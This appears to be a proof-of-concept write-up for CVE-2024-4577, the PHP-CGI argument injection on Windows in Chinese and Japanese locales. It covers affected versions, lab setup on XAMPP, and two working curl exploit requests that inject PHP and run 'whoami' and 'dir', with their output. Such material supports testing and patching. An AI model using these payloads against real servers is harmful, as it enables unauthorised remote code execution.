CVE-2024-4577

CVE-2024-4577 is a PHP CGI Argument Injection Vulnerability discovered by DEVCORE. The vulnerability has been verified on Windows machines running in the following locales:

  • Traditional Chinese (Code Page 950)

  • Simplified Chinese (Code Page 936)

  • Japanese (Code Page 932)

All versions of XAMPP on Windows are vulnerable by default. Following PHP versions are affected on the Windows operating system:

  • PHP 8.3 < 8.3.8

  • PHP 8.2 < 8.2.20

  • PHP 8.1 < 8.1.29

How to setup your own PoC environment

  1. On your Windows machine download and install XAMPP.

  2. Download mod_fcgid.so and paste it in C:\xampp\apache\modules

  3. Verify that the below code is not commented in C:\xampp\apache\conf\extra\httpd-xampp.conf

#
# PHP-CGI setup
#
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
    Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>

  1. Start the Apache / PHP using XAMPP Control Panel and verify that CGI/FastCGI is running.

  1. Change system locale to either of the three listed locales above, and reboot the host. This will not change the Windows display language. Control Panel > Clock and Region > Region > Administrative > Change system locale...

  2. Once rebooted start the webserver again and attack the target from any host.

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>"
desktop-n7r8uh6\void

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>"
 Volume in drive C has no label.
 Volume Serial Number is 0AE3-44EE

 Directory of C:\xampp\htdocs

2024-08-14  12:25    <DIR>          .
2024-08-14  10:45    <DIR>          ..
2022-06-15  18:07             3?607 applications.html
2022-06-15  18:07               177 bitnami.css
2024-08-14  10:18    <DIR>          dashboard
2015-07-16  17:32            30?894 favicon.ico
2024-08-14  10:18    <DIR>          img
2015-07-16  17:32               260 index.php
2024-08-14  10:17    <DIR>          webalizer
2024-08-14  10:18    <DIR>          xampp
               4 File(s)         34?938 bytes
               6 Dir(s)  28?033?204?224 bytes free

Last updated